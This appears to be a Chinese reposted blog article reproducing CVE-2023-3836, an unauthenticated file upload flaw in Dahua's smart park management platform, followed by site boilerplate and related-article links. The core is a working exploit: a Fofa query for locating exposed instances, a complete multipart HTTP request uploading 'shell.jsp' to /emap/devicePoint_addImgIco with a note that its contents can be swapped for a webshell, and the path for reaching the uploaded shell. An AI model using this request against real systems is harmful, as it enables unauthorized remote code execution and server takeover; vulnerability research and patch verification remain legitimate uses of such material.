大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)

这篇具有很好参考价值的文章主要介绍了大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

大华智慧园区综合管理平台是一个基于智能物联技术的园区安防、办公、运营的数字化解决方案。 大华智慧园区综合管理平台(截至 20230713)版本中存在文件上传漏洞。未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。

漏洞危害

未经授权的攻击者可通过上传jsp的webshell造成rce,获取服务器权限

Fofa检索

app=“dahua-智慧园区综合管理平台”
大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836),漏洞复现,java,网络安全,web安全大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836),漏洞复现,java,网络安全,web安全

漏洞复现

1. 构造poc

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=---------------------------23866052015499226143339905740
Content-Length: 1176

-----------------------------23866052015499226143339905740
Content-Disposition: form-data; name="upload"; filename="shell.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

123
-----------------------------23866052015499226143339905740--

2. 复现

大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836),漏洞复现,java,网络安全,web安全123可修改为webshell

3. 访问shell地址

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836),漏洞复现,java,网络安全,web安全文章来源地址https://www.toymoban.com/news/detail-737138.html

到了这里,关于大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 智慧工业园区建设方案-智慧化工园区物联网管理系统平台---豌豆云

    将化工园区海量信息互联、互通、互融,结合化工园区建设管理经验,通过“动态感知、主动监测、政企联动、综合管理”。 将事件管理从事后处置变为事前防控,保障生产安全,提升环保水平,结合可视化大屏,帮助管理者实时了解园区整体状态,为决策提供依据。助力化

    2024年01月23日
    浏览(58)
  • 蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现

    蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。 蓝凌EIS智慧协同平台 frm_form_upload.aspx接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文

    2024年01月23日
    浏览(42)
  • Sovit3D智慧园区:数字孪生园区大屏一体化管理平台

    随着全球物联网、移动互联网、云计算、大数据等新一轮信息技术的迅速发展和深入应用,推动产业升级和发展数字经济成为重要发力点。而产业园区作为产业升级转型的重要载体,建设智慧园区的需求高速增长。智慧园区在加强信息基础设施建设的同时,注重创新化、生态

    2024年01月17日
    浏览(48)
  • Liveweb智慧园区视频大数据综合监管方案

    园区面积范围广、人流量大、日常管理难度高,如何保障园区的安全生产已经成为当前的迫切要求,需要技术先进、稳定可靠的智慧安全系统来保障其正常运行、安全生产。 智慧园区借助新一代的云计算、物联网、AI、5G、大数据等技术,对现有互联网技术、传感器技术、智

    2024年02月21日
    浏览(35)
  • 智慧校园实验室安全综合管理平台如何保障实验室安全?

    一、建设思路 实验室安全综合管理平台是基于以实验室安全,用现代化管理思想与人工智能、大数据、互联网技术、物联网技术、云计算技术、人体感应技术、语音技术、生物识别技术、手机APP、自动化仪器分析技术有机结合,通过建立以实验室为中心的管理体系,从人员、

    2024年01月20日
    浏览(81)
  • VR智慧校园资中控管理平台综合提升了课堂教学质量

    随着越来越多高校在课堂中引进VR虚拟仿真实训系统,为了方便老师对全班同学进行高效率地管理,VR中控平台应运而生。下面为您详细介绍VR中控平台在课堂教学中的应用优势。 VR中控系统安装在教师总控端,融合了课件、视频、3D动画等丰富的教学资源,并且老师可以对所

    2024年02月11日
    浏览(50)
  • 泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞

    泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。 e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等

    2024年02月03日
    浏览(108)
  • 智慧园区物联网平台架构

    智慧园区,是指融合新一代信息与通信技术,具备迅捷信息采集、高速信息传输、高度集中计算、智能事务处理和无所不在的服务提供能力,实现园区内及时、互动、整合的信息感知、传递和处理,以提高园区产业集聚能力、企业经济竞争力、园区可持续发展为目标的先进园

    2024年02月12日
    浏览(43)
  • 智慧矿山2.0:煤矿智能化综合管理AI大数据监管平台建设方案设计

    一、行业背景 能源与煤矿是我国国民经济的重要物质生产部门和支柱产业之一,同时也是一个安全事故多发的高危行业,施工阶段的现场管理对工程成本、进度、质量及安全等至关重要。煤矿智能化既是未来趋势,更是产业发展需求,建设智慧煤矿已经成为矿业安全生产的必

    2024年02月10日
    浏览(55)
  • 化工园区数字孪生可视化管控平台,赋予园区安全环保智慧发展

    化工行业作为国民经济的支柱和工业发展的引擎,对安全生产、环保节能、应急管控有着很高的要求。目前国内外化工园区面临安全和环保两大压力。为有效解决这两大难题,巨蟹数科综合运用物联网、数字孪生等新一代信息技术,建设了数字孪生园区智慧化管理平台,对安

    2024年02月06日
    浏览(67)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包